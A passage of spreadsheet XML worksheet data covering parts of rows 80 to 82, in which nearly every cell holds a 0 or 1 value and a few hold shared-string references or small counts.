      <c r="OY80">
        <v>0</v>
      </c>
      <c r="OZ80">
        <v>0</v>
      </c>
      <c r="PA80">
        <v>0</v>
      </c>
      <c r="PB80">
        <v>0</v>
      </c>
      <c r="PC80">
        <v>0</v>
      </c>
      <c r="PD80">
        <v>0</v>
      </c>
      <c r="PE80">
        <v>0</v>
      </c>
      <c r="PF80">
        <v>0</v>
      </c>
      <c r="PG80">
        <v>0</v>
      </c>
      <c r="PH80">
        <v>0</v>
      </c>
      <c r="PI80">
        <v>0</v>
      </c>
      <c r="PJ80">
        <v>0</v>
      </c>
      <c r="PK80">
        <v>0</v>
      </c>
      <c r="PL80">
        <v>0</v>
      </c>
      <c r="PM80">
        <v>0</v>
      </c>
      <c r="PN80">
        <v>0</v>
      </c>
      <c r="PO80">
        <v>0</v>
      </c>
      <c r="PP80">
        <v>0</v>
      </c>
      <c r="PQ80">
        <v>0</v>
      </c>
      <c r="PR80">
        <v>0</v>
      </c>
      <c r="PS80">
        <v>0</v>
      </c>
      <c r="PT80">
        <v>0</v>
      </c>
      <c r="PU80">
        <v>0</v>
      </c>
      <c r="PV80">
        <v>0</v>
      </c>
      <c r="PW80">
        <v>0</v>
      </c>
      <c r="PX80">
        <v>0</v>
      </c>
      <c r="PY80">
        <v>0</v>
      </c>
      <c r="PZ80">
        <v>0</v>
      </c>
      <c r="QA80">
        <v>0</v>
      </c>
      <c r="QB80">
        <v>0</v>
      </c>
      <c r="QC80">
        <v>0</v>
      </c>
      <c r="QD80">
        <v>0</v>
      </c>
      <c r="QE80">
        <v>0</v>
      </c>
      <c r="QF80">
        <v>0</v>
      </c>
      <c r="QG80">
        <v>0</v>
      </c>
      <c r="QH80">
        <v>0</v>
      </c>
      <c r="QI80">
        <v>0</v>
      </c>
      <c r="QJ80">
        <v>0</v>
      </c>
      <c r="QK80">
        <v>0</v>
      </c>
      <c r="QL80">
        <v>0</v>
      </c>
      <c r="QM80">
        <v>0</v>
      </c>
      <c r="QN80">
        <v>0</v>
      </c>
      <c r="QO80">
        <v>0</v>
      </c>
      <c r="QP80">
        <v>0</v>
      </c>
      <c r="QQ80">
        <v>0</v>
      </c>
      <c r="QR80">
        <v>0</v>
      </c>
      <c r="QS80">
        <v>0</v>
      </c>
      <c r="QT80">
        <v>0</v>
      </c>
      <c r="QU80">
        <v>0</v>
      </c>
      <c r="QV80">
        <v>0</v>
      </c>
      <c r="QW80">
        <v>0</v>
      </c>
      <c r="QX80">
        <v>0</v>
      </c>
      <c r="QY80">
        <v>0</v>
      </c>
      <c r="QZ80">
        <v>0</v>
      </c>
      <c r="RA80">
        <v>0</v>
      </c>
      <c r="RB80">
        <v>0</v>
      </c>
      <c r="RC80">
        <v>0</v>
      </c>
      <c r="RD80">
        <v>0</v>
      </c>
      <c r="RE80">
        <v>0</v>
      </c>
      <c r="RF80">
        <v>0</v>
      </c>
      <c r="RG80">
        <v>0</v>
      </c>
      <c r="RH80">
        <v>0</v>
      </c>
      <c r="RI80">
        <v>0</v>
      </c>
      <c r="RJ80">
        <v>0</v>
      </c>
      <c r="RK80">
        <v>0</v>
      </c>
      <c r="RL80">
        <v>0</v>
      </c>
      <c r="RM80">
        <v>0</v>
      </c>
      <c r="RN80">
        <v>0</v>
      </c>
      <c r="RO80">
        <v>0</v>
      </c>
      <c r="RP80">
        <v>0</v>
      </c>
      <c r="RQ80">
        <v>0</v>
      </c>
      <c r="RR80">
        <v>0</v>
      </c>
      <c r="RS80">
        <v>0</v>
      </c>
      <c r="RT80">
        <v>0</v>
      </c>
      <c r="RU80">
        <v>0</v>
      </c>
      <c r="RV80">
        <v>0</v>
      </c>
      <c r="RW80">
        <v>0</v>
      </c>
      <c r="RX80">
        <v>0</v>
      </c>
      <c r="RY80">
        <v>0</v>
      </c>
      <c r="RZ80">
        <v>0</v>
      </c>
      <c r="SA80">
        <v>0</v>
      </c>
    </row>
    <row r="81" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A81" s="6" t="s">
        <v>3305</v>
      </c>
      <c r="B81">
        <v>60</v>
      </c>
      <c r="C81">
        <v>0</v>
      </c>
      <c r="D81">
        <v>0</v>
      </c>
      <c r="E81">
        <v>0</v>
      </c>
      <c r="F81">
        <v>0</v>
      </c>
      <c r="G81">
        <v>0</v>
      </c>
      <c r="H81">
        <v>0</v>
      </c>
      <c r="I81">
        <v>0</v>
      </c>
      <c r="J81">
        <v>0</v>
      </c>
      <c r="K81">
        <v>0</v>
      </c>
      <c r="L81">
        <v>0</v>
      </c>
      <c r="M81">
        <v>0</v>
      </c>
      <c r="N81">
        <v>0</v>
      </c>
      <c r="O81">
        <v>0</v>
      </c>
      <c r="P81">
        <v>0</v>
      </c>
      <c r="Q81">
        <v>0</v>
      </c>
      <c r="R81">
        <v>0</v>
      </c>
      <c r="S81">
        <v>0</v>
      </c>
      <c r="T81">
        <v>0</v>
      </c>
      <c r="U81">
        <v>0</v>
      </c>
      <c r="V81">
        <v>0</v>
      </c>
      <c r="W81">
        <v>1</v>
      </c>
      <c r="X81">
        <v>0</v>
      </c>
      <c r="Y81">
        <v>0</v>
      </c>
      <c r="Z81">
        <v>0</v>
      </c>
      <c r="AA81">
        <v>0</v>
      </c>
      <c r="AB81">
        <v>0</v>
      </c>
      <c r="AC81">
        <v>1</v>
      </c>
      <c r="AD81">
        <v>0</v>
      </c>
      <c r="AE81">
        <v>0</v>
      </c>
      <c r="AF81">
        <v>0</v>
      </c>
      <c r="AG81">
        <v>0</v>
      </c>
      <c r="AH81">
        <v>0</v>
      </c>
      <c r="AI81">
        <v>0</v>
      </c>
      <c r="AJ81">
        <v>0</v>
      </c>
      <c r="AK81">
        <v>0</v>
      </c>
      <c r="AL81">
        <v>1</v>
      </c>
      <c r="AM81">
        <v>0</v>
      </c>
      <c r="AN81">
        <v>1</v>
      </c>
      <c r="AO81">
        <v>1</v>
      </c>
      <c r="AP81">
        <v>0</v>
      </c>
      <c r="AQ81">
        <v>0</v>
      </c>
      <c r="AR81">
        <v>0</v>
      </c>
      <c r="AS81">
        <v>0</v>
      </c>
      <c r="AT81">
        <v>1</v>
      </c>
      <c r="AU81">
        <v>0</v>
      </c>
      <c r="AV81">
        <v>0</v>
      </c>
      <c r="AW81">
        <v>0</v>
      </c>
      <c r="AX81">
        <v>0</v>
      </c>
      <c r="AY81">
        <v>0</v>
      </c>
      <c r="AZ81">
        <v>0</v>
      </c>
      <c r="BA81">
        <v>0</v>
      </c>
      <c r="BB81">
        <v>0</v>
      </c>
      <c r="BC81">
        <v>0</v>
      </c>
      <c r="BD81">
        <v>0</v>
      </c>
      <c r="BE81">
        <v>0</v>
      </c>
      <c r="BF81">
        <v>0</v>
      </c>
      <c r="BG81">
        <v>0</v>
      </c>
      <c r="BH81">
        <v>0</v>
      </c>
      <c r="BI81">
        <v>0</v>
      </c>
      <c r="BJ81">
        <v>1</v>
      </c>
      <c r="BK81">
        <v>0</v>
      </c>
      <c r="BL81">
        <v>0</v>
      </c>
      <c r="BM81">
        <v>0</v>
      </c>
      <c r="BN81">
        <v>0</v>
      </c>
      <c r="BO81">
        <v>0</v>
      </c>
      <c r="BP81">
        <v>0</v>
      </c>
      <c r="BQ81">
        <v>0</v>
      </c>
      <c r="BR81">
        <v>1</v>
      </c>
      <c r="BS81">
        <v>0</v>
      </c>
      <c r="BT81">
        <v>0</v>
      </c>
      <c r="BU81">
        <v>0</v>
      </c>
      <c r="BV81">
        <v>1</v>
      </c>
      <c r="BW81">
        <v>0</v>
      </c>
      <c r="BX81">
        <v>1</v>
      </c>
      <c r="BY81">
        <v>0</v>
      </c>
      <c r="BZ81">
        <v>0</v>
      </c>
      <c r="CA81">
        <v>0</v>
      </c>
      <c r="CB81">
        <v>0</v>
      </c>
      <c r="CC81">
        <v>0</v>
      </c>
      <c r="CD81">
        <v>0</v>
      </c>
      <c r="CE81">
        <v>1</v>
      </c>
      <c r="CF81">
        <v>1</v>
      </c>
      <c r="CG81">
        <v>0</v>
      </c>
      <c r="CH81">
        <v>0</v>
      </c>
      <c r="CI81">
        <v>0</v>
      </c>
      <c r="CJ81">
        <v>0</v>
      </c>
      <c r="CK81">
        <v>1</v>
      </c>
      <c r="CL81">
        <v>1</v>
      </c>
      <c r="CM81">
        <v>0</v>
      </c>
      <c r="CN81">
        <v>0</v>
      </c>
      <c r="CO81">
        <v>0</v>
      </c>
      <c r="CP81">
        <v>0</v>
      </c>
      <c r="CQ81">
        <v>0</v>
      </c>
      <c r="CR81">
        <v>0</v>
      </c>
      <c r="CS81">
        <v>0</v>
      </c>
      <c r="CT81">
        <v>0</v>
      </c>
      <c r="CU81">
        <v>0</v>
      </c>
      <c r="CV81">
        <v>0</v>
      </c>
      <c r="CW81">
        <v>0</v>
      </c>
      <c r="CX81">
        <v>0</v>
      </c>
      <c r="CY81">
        <v>0</v>
      </c>
      <c r="CZ81">
        <v>0</v>
      </c>
      <c r="DA81">
        <v>0</v>
      </c>
      <c r="DB81">
        <v>1</v>
      </c>
      <c r="DC81">
        <v>1</v>
      </c>
      <c r="DD81">
        <v>0</v>
      </c>
      <c r="DE81">
        <v>0</v>
      </c>
      <c r="DF81">
        <v>0</v>
      </c>
      <c r="DG81">
        <v>0</v>
      </c>
      <c r="DH81">
        <v>0</v>
      </c>
      <c r="DI81">
        <v>0</v>
      </c>
      <c r="DJ81">
        <v>0</v>
      </c>
      <c r="DK81">
        <v>0</v>
      </c>
      <c r="DL81">
        <v>0</v>
      </c>
      <c r="DM81">
        <v>0</v>
      </c>
      <c r="DN81">
        <v>0</v>
      </c>
      <c r="DO81">
        <v>0</v>
      </c>
      <c r="DP81">
        <v>0</v>
      </c>
      <c r="DQ81">
        <v>0</v>
      </c>
      <c r="DR81">
        <v>0</v>
      </c>
      <c r="DS81">
        <v>0</v>
      </c>
      <c r="DT81">
        <v>0</v>
      </c>
      <c r="DU81">
        <v>0</v>
      </c>
      <c r="DV81">
        <v>0</v>
      </c>
      <c r="DW81">
        <v>0</v>
      </c>
      <c r="DX81">
        <v>0</v>
      </c>
      <c r="DY81">
        <v>1</v>
      </c>
      <c r="DZ81">
        <v>0</v>
      </c>
      <c r="EA81">
        <v>0</v>
      </c>
      <c r="EB81">
        <v>0</v>
      </c>
      <c r="EC81">
        <v>1</v>
      </c>
      <c r="ED81">
        <v>0</v>
      </c>
      <c r="EE81">
        <v>0</v>
      </c>
      <c r="EF81">
        <v>0</v>
      </c>
      <c r="EG81">
        <v>0</v>
      </c>
      <c r="EH81">
        <v>0</v>
      </c>
      <c r="EI81">
        <v>0</v>
      </c>
      <c r="EJ81">
        <v>0</v>
      </c>
      <c r="EK81">
        <v>1</v>
      </c>
      <c r="EL81">
        <v>1</v>
      </c>
      <c r="EM81">
        <v>0</v>
      </c>
      <c r="EN81">
        <v>0</v>
      </c>
      <c r="EO81">
        <v>0</v>
      </c>
      <c r="EP81">
        <v>0</v>
      </c>
      <c r="EQ81">
        <v>0</v>
      </c>
      <c r="ER81">
        <v>0</v>
      </c>
      <c r="ES81">
        <v>0</v>
      </c>
      <c r="ET81">
        <v>0</v>
      </c>
      <c r="EU81">
        <v>0</v>
      </c>
      <c r="EV81">
        <v>0</v>
      </c>
      <c r="EW81">
        <v>0</v>
      </c>
      <c r="EX81">
        <v>1</v>
      </c>
      <c r="EY81">
        <v>0</v>
      </c>
      <c r="EZ81">
        <v>1</v>
      </c>
      <c r="FA81">
        <v>0</v>
      </c>
      <c r="FB81">
        <v>0</v>
      </c>
      <c r="FC81">
        <v>0</v>
      </c>
      <c r="FD81">
        <v>0</v>
      </c>
      <c r="FE81">
        <v>0</v>
      </c>
      <c r="FF81">
        <v>0</v>
      </c>
      <c r="FG81">
        <v>0</v>
      </c>
      <c r="FH81">
        <v>0</v>
      </c>
      <c r="FI81">
        <v>0</v>
      </c>
      <c r="FJ81">
        <v>0</v>
      </c>
      <c r="FK81">
        <v>0</v>
      </c>
      <c r="FL81">
        <v>0</v>
      </c>
      <c r="FM81">
        <v>0</v>
      </c>
      <c r="FN81">
        <v>0</v>
      </c>
      <c r="FO81">
        <v>0</v>
      </c>
      <c r="FP81">
        <v>0</v>
      </c>
      <c r="FQ81">
        <v>0</v>
      </c>
      <c r="FR81">
        <v>0</v>
      </c>
      <c r="FS81">
        <v>0</v>
      </c>
      <c r="FT81">
        <v>0</v>
      </c>
      <c r="FU81">
        <v>0</v>
      </c>
      <c r="FV81">
        <v>0</v>
      </c>
      <c r="FW81">
        <v>0</v>
      </c>
      <c r="FX81">
        <v>1</v>
      </c>
      <c r="FY81">
        <v>0</v>
      </c>
      <c r="FZ81">
        <v>0</v>
      </c>
      <c r="GA81">
        <v>0</v>
      </c>
      <c r="GB81">
        <v>0</v>
      </c>
      <c r="GC81">
        <v>0</v>
      </c>
      <c r="GD81">
        <v>0</v>
      </c>
      <c r="GE81">
        <v>0</v>
      </c>
      <c r="GF81">
        <v>1</v>
      </c>
      <c r="GG81">
        <v>0</v>
      </c>
      <c r="GH81">
        <v>0</v>
      </c>
      <c r="GI81">
        <v>1</v>
      </c>
      <c r="GJ81">
        <v>0</v>
      </c>
      <c r="GK81">
        <v>0</v>
      </c>
      <c r="GL81">
        <v>0</v>
      </c>
      <c r="GM81">
        <v>0</v>
      </c>
      <c r="GN81">
        <v>0</v>
      </c>
      <c r="GO81">
        <v>0</v>
      </c>
      <c r="GP81">
        <v>0</v>
      </c>
      <c r="GQ81">
        <v>1</v>
      </c>
      <c r="GR81">
        <v>0</v>
      </c>
      <c r="GS81">
        <v>0</v>
      </c>
      <c r="GT81">
        <v>0</v>
      </c>
      <c r="GU81">
        <v>1</v>
      </c>
      <c r="GV81">
        <v>0</v>
      </c>
      <c r="GW81">
        <v>0</v>
      </c>
      <c r="GX81">
        <v>0</v>
      </c>
      <c r="GY81">
        <v>0</v>
      </c>
      <c r="GZ81">
        <v>0</v>
      </c>
      <c r="HA81">
        <v>0</v>
      </c>
      <c r="HB81">
        <v>1</v>
      </c>
      <c r="HC81">
        <v>0</v>
      </c>
      <c r="HD81">
        <v>0</v>
      </c>
      <c r="HE81">
        <v>0</v>
      </c>
      <c r="HF81">
        <v>0</v>
      </c>
      <c r="HG81">
        <v>1</v>
      </c>
      <c r="HH81">
        <v>1</v>
      </c>
      <c r="HI81">
        <v>0</v>
      </c>
      <c r="HJ81">
        <v>0</v>
      </c>
      <c r="HK81">
        <v>0</v>
      </c>
      <c r="HL81">
        <v>0</v>
      </c>
      <c r="HM81">
        <v>0</v>
      </c>
      <c r="HN81">
        <v>0</v>
      </c>
      <c r="HO81">
        <v>0</v>
      </c>
      <c r="HP81">
        <v>0</v>
      </c>
      <c r="HQ81">
        <v>0</v>
      </c>
      <c r="HR81">
        <v>1</v>
      </c>
      <c r="HS81">
        <v>0</v>
      </c>
      <c r="HT81">
        <v>0</v>
      </c>
      <c r="HU81">
        <v>0</v>
      </c>
      <c r="HV81">
        <v>1</v>
      </c>
      <c r="HW81">
        <v>0</v>
      </c>
      <c r="HX81">
        <v>0</v>
      </c>
      <c r="HY81">
        <v>0</v>
      </c>
      <c r="HZ81">
        <v>0</v>
      </c>
      <c r="IA81">
        <v>0</v>
      </c>
      <c r="IB81">
        <v>0</v>
      </c>
      <c r="IC81">
        <v>0</v>
      </c>
      <c r="ID81">
        <v>0</v>
      </c>
      <c r="IE81">
        <v>0</v>
      </c>
      <c r="IF81">
        <v>0</v>
      </c>
      <c r="IG81">
        <v>0</v>
      </c>
      <c r="IH81">
        <v>0</v>
      </c>
      <c r="II81">
        <v>0</v>
      </c>
      <c r="IJ81">
        <v>0</v>
      </c>
      <c r="IK81">
        <v>0</v>
      </c>
      <c r="IL81">
        <v>0</v>
      </c>
      <c r="IM81">
        <v>1</v>
      </c>
      <c r="IN81">
        <v>0</v>
      </c>
      <c r="IO81">
        <v>0</v>
      </c>
      <c r="IP81">
        <v>0</v>
      </c>
      <c r="IQ81">
        <v>0</v>
      </c>
      <c r="IR81">
        <v>0</v>
      </c>
      <c r="IS81">
        <v>0</v>
      </c>
      <c r="IT81">
        <v>0</v>
      </c>
      <c r="IU81">
        <v>0</v>
      </c>
      <c r="IV81">
        <v>0</v>
      </c>
      <c r="IW81">
        <v>0</v>
      </c>
      <c r="IX81">
        <v>0</v>
      </c>
      <c r="IY81">
        <v>0</v>
      </c>
      <c r="IZ81">
        <v>0</v>
      </c>
      <c r="JA81">
        <v>0</v>
      </c>
      <c r="JB81">
        <v>0</v>
      </c>
      <c r="JC81">
        <v>0</v>
      </c>
      <c r="JD81">
        <v>0</v>
      </c>
      <c r="JE81">
        <v>0</v>
      </c>
      <c r="JF81">
        <v>0</v>
      </c>
      <c r="JG81">
        <v>0</v>
      </c>
      <c r="JH81">
        <v>0</v>
      </c>
      <c r="JI81">
        <v>0</v>
      </c>
      <c r="JJ81">
        <v>0</v>
      </c>
      <c r="JK81">
        <v>0</v>
      </c>
      <c r="JL81">
        <v>0</v>
      </c>
      <c r="JM81">
        <v>1</v>
      </c>
      <c r="JN81">
        <v>0</v>
      </c>
      <c r="JO81">
        <v>0</v>
      </c>
      <c r="JP81">
        <v>0</v>
      </c>
      <c r="JQ81">
        <v>0</v>
      </c>
      <c r="JR81">
        <v>0</v>
      </c>
      <c r="JS81">
        <v>0</v>
      </c>
      <c r="JT81">
        <v>0</v>
      </c>
      <c r="JU81">
        <v>1</v>
      </c>
      <c r="JV81">
        <v>0</v>
      </c>
      <c r="JW81">
        <v>1</v>
      </c>
      <c r="JX81">
        <v>0</v>
      </c>
      <c r="JY81">
        <v>0</v>
      </c>
      <c r="JZ81">
        <v>0</v>
      </c>
      <c r="KA81">
        <v>0</v>
      </c>
      <c r="KB81">
        <v>0</v>
      </c>
      <c r="KC81">
        <v>0</v>
      </c>
      <c r="KD81">
        <v>0</v>
      </c>
      <c r="KE81">
        <v>1</v>
      </c>
      <c r="KF81">
        <v>0</v>
      </c>
      <c r="KG81">
        <v>0</v>
      </c>
      <c r="KH81">
        <v>0</v>
      </c>
      <c r="KI81">
        <v>1</v>
      </c>
      <c r="KJ81">
        <v>1</v>
      </c>
      <c r="KK81">
        <v>0</v>
      </c>
      <c r="KL81">
        <v>0</v>
      </c>
      <c r="KM81">
        <v>0</v>
      </c>
      <c r="KN81">
        <v>1</v>
      </c>
      <c r="KO81">
        <v>1</v>
      </c>
      <c r="KP81">
        <v>0</v>
      </c>
      <c r="KQ81">
        <v>0</v>
      </c>
      <c r="KR81">
        <v>0</v>
      </c>
      <c r="KS81">
        <v>0</v>
      </c>
      <c r="KT81">
        <v>0</v>
      </c>
      <c r="KU81">
        <v>1</v>
      </c>
      <c r="KV81">
        <v>0</v>
      </c>
      <c r="KW81">
        <v>0</v>
      </c>
      <c r="KX81">
        <v>0</v>
      </c>
      <c r="KY81">
        <v>0</v>
      </c>
      <c r="KZ81">
        <v>0</v>
      </c>
      <c r="LA81">
        <v>0</v>
      </c>
      <c r="LB81">
        <v>1</v>
      </c>
      <c r="LC81">
        <v>0</v>
      </c>
      <c r="LD81">
        <v>0</v>
      </c>
      <c r="LE81">
        <v>0</v>
      </c>
      <c r="LF81">
        <v>1</v>
      </c>
      <c r="LG81">
        <v>0</v>
      </c>
      <c r="LH81">
        <v>0</v>
      </c>
      <c r="LI81">
        <v>0</v>
      </c>
      <c r="LJ81">
        <v>0</v>
      </c>
      <c r="LK81">
        <v>0</v>
      </c>
      <c r="LL81">
        <v>0</v>
      </c>
      <c r="LM81">
        <v>0</v>
      </c>
      <c r="LN81">
        <v>0</v>
      </c>
      <c r="LO81">
        <v>0</v>
      </c>
      <c r="LP81">
        <v>0</v>
      </c>
      <c r="LQ81">
        <v>0</v>
      </c>
      <c r="LR81">
        <v>0</v>
      </c>
      <c r="LS81">
        <v>0</v>
      </c>
      <c r="LT81">
        <v>0</v>
      </c>
      <c r="LU81">
        <v>0</v>
      </c>
      <c r="LV81">
        <v>1</v>
      </c>
      <c r="LW81">
        <v>0</v>
      </c>
      <c r="LX81">
        <v>0</v>
      </c>
      <c r="LY81">
        <v>0</v>
      </c>
      <c r="LZ81">
        <v>1</v>
      </c>
      <c r="MA81">
        <v>0</v>
      </c>
      <c r="MB81">
        <v>1</v>
      </c>
      <c r="MC81">
        <v>0</v>
      </c>
      <c r="MD81">
        <v>0</v>
      </c>
      <c r="ME81">
        <v>0</v>
      </c>
      <c r="MF81">
        <v>0</v>
      </c>
      <c r="MG81">
        <v>0</v>
      </c>
      <c r="MH81">
        <v>0</v>
      </c>
      <c r="MI81">
        <v>0</v>
      </c>
      <c r="MJ81">
        <v>0</v>
      </c>
      <c r="MK81">
        <v>0</v>
      </c>
      <c r="ML81">
        <v>0</v>
      </c>
      <c r="MM81">
        <v>0</v>
      </c>
      <c r="MN81">
        <v>0</v>
      </c>
      <c r="MO81">
        <v>0</v>
      </c>
      <c r="MP81">
        <v>0</v>
      </c>
      <c r="MQ81">
        <v>0</v>
      </c>
      <c r="MR81">
        <v>0</v>
      </c>
      <c r="MS81">
        <v>1</v>
      </c>
      <c r="MT81">
        <v>0</v>
      </c>
      <c r="MU81">
        <v>0</v>
      </c>
      <c r="MV81">
        <v>0</v>
      </c>
      <c r="MW81">
        <v>0</v>
      </c>
      <c r="MX81">
        <v>1</v>
      </c>
      <c r="MY81">
        <v>0</v>
      </c>
      <c r="MZ81">
        <v>0</v>
      </c>
      <c r="NA81">
        <v>0</v>
      </c>
      <c r="NB81">
        <v>0</v>
      </c>
      <c r="NC81">
        <v>0</v>
      </c>
      <c r="ND81">
        <v>0</v>
      </c>
      <c r="NE81">
        <v>1</v>
      </c>
      <c r="NF81">
        <v>0</v>
      </c>
      <c r="NG81">
        <v>0</v>
      </c>
      <c r="NH81">
        <v>0</v>
      </c>
      <c r="NI81">
        <v>0</v>
      </c>
      <c r="NJ81">
        <v>0</v>
      </c>
      <c r="NK81">
        <v>1</v>
      </c>
      <c r="NL81">
        <v>0</v>
      </c>
      <c r="NM81">
        <v>0</v>
      </c>
      <c r="NN81">
        <v>0</v>
      </c>
      <c r="NO81">
        <v>0</v>
      </c>
      <c r="NP81">
        <v>0</v>
      </c>
      <c r="NQ81">
        <v>0</v>
      </c>
      <c r="NR81">
        <v>0</v>
      </c>
      <c r="NS81">
        <v>0</v>
      </c>
      <c r="NT81">
        <v>0</v>
      </c>
      <c r="NU81">
        <v>0</v>
      </c>
      <c r="NV81">
        <v>0</v>
      </c>
      <c r="NW81">
        <v>0</v>
      </c>
      <c r="NX81">
        <v>1</v>
      </c>
      <c r="NY81">
        <v>0</v>
      </c>
      <c r="NZ81">
        <v>0</v>
      </c>
      <c r="OA81">
        <v>0</v>
      </c>
      <c r="OB81">
        <v>0</v>
      </c>
      <c r="OC81">
        <v>0</v>
      </c>
      <c r="OD81">
        <v>0</v>
      </c>
      <c r="OE81">
        <v>0</v>
      </c>
      <c r="OF81">
        <v>0</v>
      </c>
      <c r="OG81">
        <v>0</v>
      </c>
      <c r="OH81">
        <v>0</v>
      </c>
      <c r="OI81">
        <v>0</v>
      </c>
      <c r="OJ81">
        <v>0</v>
      </c>
      <c r="OK81">
        <v>0</v>
      </c>
      <c r="OL81">
        <v>0</v>
      </c>
      <c r="OM81">
        <v>0</v>
      </c>
      <c r="ON81">
        <v>0</v>
      </c>
      <c r="OO81">
        <v>0</v>
      </c>
      <c r="OP81">
        <v>0</v>
      </c>
      <c r="OQ81">
        <v>0</v>
      </c>
      <c r="OR81">
        <v>0</v>
      </c>
      <c r="OS81">
        <v>0</v>
      </c>
      <c r="OT81">
        <v>0</v>
      </c>
      <c r="OU81">
        <v>0</v>
      </c>
      <c r="OV81">
        <v>0</v>
      </c>
      <c r="OW81">
        <v>0</v>
      </c>
      <c r="OX81">
        <v>0</v>
      </c>
      <c r="OY81">
        <v>0</v>
      </c>
      <c r="OZ81">
        <v>0</v>
      </c>
      <c r="PA81">
        <v>1</v>
      </c>
      <c r="PB81">
        <v>0</v>
      </c>
      <c r="PC81">
        <v>0</v>
      </c>
      <c r="PD81">
        <v>0</v>
      </c>
      <c r="PE81">
        <v>0</v>
      </c>
      <c r="PF81">
        <v>1</v>
      </c>
      <c r="PG81">
        <v>0</v>
      </c>
      <c r="PH81">
        <v>0</v>
      </c>
      <c r="PI81">
        <v>0</v>
      </c>
      <c r="PJ81">
        <v>0</v>
      </c>
      <c r="PK81">
        <v>0</v>
      </c>
      <c r="PL81">
        <v>0</v>
      </c>
      <c r="PM81">
        <v>0</v>
      </c>
      <c r="PN81">
        <v>1</v>
      </c>
      <c r="PO81">
        <v>0</v>
      </c>
      <c r="PP81">
        <v>0</v>
      </c>
      <c r="PQ81">
        <v>0</v>
      </c>
      <c r="PR81">
        <v>1</v>
      </c>
      <c r="PS81">
        <v>0</v>
      </c>
      <c r="PT81">
        <v>0</v>
      </c>
      <c r="PU81">
        <v>0</v>
      </c>
      <c r="PV81">
        <v>0</v>
      </c>
      <c r="PW81">
        <v>0</v>
      </c>
      <c r="PX81">
        <v>0</v>
      </c>
      <c r="PY81">
        <v>0</v>
      </c>
      <c r="PZ81">
        <v>0</v>
      </c>
      <c r="QA81">
        <v>0</v>
      </c>
      <c r="QB81">
        <v>0</v>
      </c>
      <c r="QC81">
        <v>1</v>
      </c>
      <c r="QD81">
        <v>1</v>
      </c>
      <c r="QE81">
        <v>0</v>
      </c>
      <c r="QF81">
        <v>0</v>
      </c>
      <c r="QG81">
        <v>0</v>
      </c>
      <c r="QH81">
        <v>0</v>
      </c>
      <c r="QI81">
        <v>0</v>
      </c>
      <c r="QJ81">
        <v>0</v>
      </c>
      <c r="QK81">
        <v>0</v>
      </c>
      <c r="QL81">
        <v>0</v>
      </c>
      <c r="QM81">
        <v>0</v>
      </c>
      <c r="QN81">
        <v>0</v>
      </c>
      <c r="QO81">
        <v>0</v>
      </c>
      <c r="QP81">
        <v>0</v>
      </c>
      <c r="QQ81">
        <v>0</v>
      </c>
      <c r="QR81">
        <v>0</v>
      </c>
      <c r="QS81">
        <v>0</v>
      </c>
      <c r="QT81">
        <v>0</v>
      </c>
      <c r="QU81">
        <v>0</v>
      </c>
      <c r="QV81">
        <v>0</v>
      </c>
      <c r="QW81">
        <v>0</v>
      </c>
      <c r="QX81">
        <v>0</v>
      </c>
      <c r="QY81">
        <v>0</v>
      </c>
      <c r="QZ81">
        <v>0</v>
      </c>
      <c r="RA81">
        <v>0</v>
      </c>
      <c r="RB81">
        <v>0</v>
      </c>
      <c r="RC81">
        <v>0</v>
      </c>
      <c r="RD81">
        <v>0</v>
      </c>
      <c r="RE81">
        <v>0</v>
      </c>
      <c r="RF81">
        <v>0</v>
      </c>
      <c r="RG81">
        <v>0</v>
      </c>
      <c r="RH81">
        <v>0</v>
      </c>
      <c r="RI81">
        <v>0</v>
      </c>
      <c r="RJ81">
        <v>0</v>
      </c>
      <c r="RK81">
        <v>0</v>
      </c>
      <c r="RL81">
        <v>0</v>
      </c>
      <c r="RM81">
        <v>0</v>
      </c>
      <c r="RN81">
        <v>0</v>
      </c>
      <c r="RO81">
        <v>0</v>
      </c>
      <c r="RP81">
        <v>0</v>
      </c>
      <c r="RQ81">
        <v>0</v>
      </c>
      <c r="RR81">
        <v>1</v>
      </c>
      <c r="RS81">
        <v>0</v>
      </c>
      <c r="RT81">
        <v>0</v>
      </c>
      <c r="RU81">
        <v>0</v>
      </c>
      <c r="RV81">
        <v>0</v>
      </c>
      <c r="RW81">
        <v>0</v>
      </c>
      <c r="RX81">
        <v>0</v>
      </c>
      <c r="RY81">
        <v>0</v>
      </c>
      <c r="RZ81">
        <v>1</v>
      </c>
      <c r="SA81">
        <v>0</v>
      </c>
    </row>
    <row r="82" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A82" s="6" t="s">
        <v>3311</v>
      </c>
      <c r="B82">
        <v>4</v>
      </c>
      <c r="C82">
        <v>0</v>
      </c>
      <c r="D82">
        <v>0</v>
      </c>
      <c r="E82">
        <v>0</v>
      </c>
      <c r="F82">
        <v>0</v>
      </c>
      <c r="G82">
        <v>0</v>
      </c>
      <c r="H82">
        <v>0</v>
      </c>
      <c r="I82">
        <v>0</v>
      </c>
      <c r="J82">
        <v>0</v>
      </c>
      <c r="K82">
        <v>0</v>
      </c>
      <c r="L82">
        <v>0</v>
      </c>
      <c r="M82">
        <v>0</v>
      </c>
      <c r="N82">
        <v>0</v>
      </c>
      <c r="O82">
        <v>0</v>
      </c>
      <c r="P82">
        <v>0</v>
      </c>
      <c r="Q82">
        <v>0</v>
      </c>
      <c r="R82">
        <v>0</v>
      </c>
      <c r="S82">
        <v>0</v>
      </c>
      <c r="T82">
        <v>0</v>
      </c>
      <c r="U82">
        <v>0</v>
      </c>
      <c r="V82">
        <v>0</v>
      </c>
      <c r="W82">
        <v>1</v>
      </c>
      <c r="X82">
        <v>0</v>
      </c>
      <c r="Y82">
        <v>0</v>
      </c>
      <c r="Z82">
        <v>0</v>
      </c>
      <c r="AA82">
        <v>0</v>
      </c>
      <c r="AB82">
        <v>0</v>
      </c>
      <c r="AC82">
        <v>0</v>
      </c>
      <c r="AD82">
        <v>0</v>
      </c>
      <c r="AE82">
        <v>0</v>
      </c>
      <c r="AF82">
        <v>0</v>
      </c>
      <c r="AG82">
        <v>0</v>
      </c>
      <c r="AH82">
        <v>0</v>
      </c>
      <c r="AI82">
        <v>0</v>
      </c>
      <c r="AJ82">
        <v>0</v>
      </c>
      <c r="AK82">
        <v>0</v>
      </c>
      <c r="AL82">
        <v>0</v>
      </c>
      <c r="AM82">
        <v>0</v>
      </c>
      <c r="AN82">
        <v>0</v>
      </c>
      <c r="AO82">
        <v>0</v>
      </c>
      <c r="AP82">
        <v>0</v>
      </c>
      <c r="AQ82">
        <v>0</v>
      </c>
      <c r="AR82">
        <v>0</v>
      </c>
      <c r="AS82">
